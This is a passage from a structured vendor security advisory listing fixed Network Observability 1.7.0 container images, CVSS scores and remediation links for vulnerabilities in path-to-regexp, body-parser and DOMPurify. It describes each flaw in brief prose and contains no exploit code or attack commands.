"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { cve: "CVE-2024-45801", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-16T19:20:09.863249+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2312631", }, ], notes: [ { category: "description", text: "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.", title: "Vulnerability description", }, { category: "summary", text: "dompurify: XSS vulnerability via prototype pollution", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ 